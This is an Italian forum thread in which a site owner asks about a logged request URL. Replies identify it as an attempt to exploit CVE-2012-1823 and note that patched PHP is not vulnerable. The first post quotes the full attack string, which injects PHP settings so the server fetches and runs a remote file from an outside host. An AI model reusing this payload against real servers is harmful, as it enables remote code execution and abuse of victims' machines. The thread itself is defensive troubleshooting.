Tentativi di hackeraggio

**SoloWiFi** · 06-12-2020, 11:38

E' da qualche giorno che ricevo degli errori 404 con questo tipo di richiesta link:

https://www.MioSito.it:443/index.php?-dsafe_mode%3doff+-ddisable_functions%3dnull+-dallow_url_fopen%3don+-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.lightning-systems.com/img/res/_vti_cnf/default.txt

Se andiamo a vedere cosa c'è nell'url accodato (http://www.lightning-systems.com/img...nf/default.txt) credo che sia un tentativo di iniezione ... sapete darmi maggiori info?

Grazie

**SoloWiFi** · 07-12-2020, 09:35

Up

**M4V1** · 07-12-2020, 14:21

Tentano di sfruttare un vecchio bug che è questo: http://cve.mitre.org/cgi-bin/cvename...=CVE-2012-1823

Il file che tentano di inserire servirebbe ad inviare email dal tuo server. In ogni caso se hai un php aggiornato (nemmeno troppo a dire il vero, basta che sia >= 5.4.2) non hai nulla da temere.

**Vincent.Zeno** · 07-12-2020, 14:33

tra l'altro credo che quelli di lightning-systems siano ignari di avere quel file sul server...

**SoloWiFi** · 07-12-2020, 16:32

Ok. Non uso PHP ma l'ho portato a 7.0

Discussione: Tentativi di hackeraggio

Strumenti discussione

Ricerca discussione

Visualizza

Tentativi di hackeraggio

Permessi di invio